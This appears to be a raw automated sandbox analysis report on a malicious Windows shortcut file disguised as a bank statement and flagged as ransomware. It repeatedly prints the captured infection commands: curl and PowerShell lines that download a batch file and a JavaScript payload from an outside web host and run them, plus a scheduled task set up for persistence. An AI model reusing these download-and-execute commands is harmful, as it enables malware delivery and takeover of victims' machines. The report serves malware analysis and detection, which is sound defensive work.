Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: classification engineClassification label: mal100.rans.winLNK@32/16@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4dac66.TMP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.batJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\curl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.jsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: chasebank_statement_mar.lnkLNK file: ..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848F100BD pushad ; iretd 7_2_00007FF848F100C1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
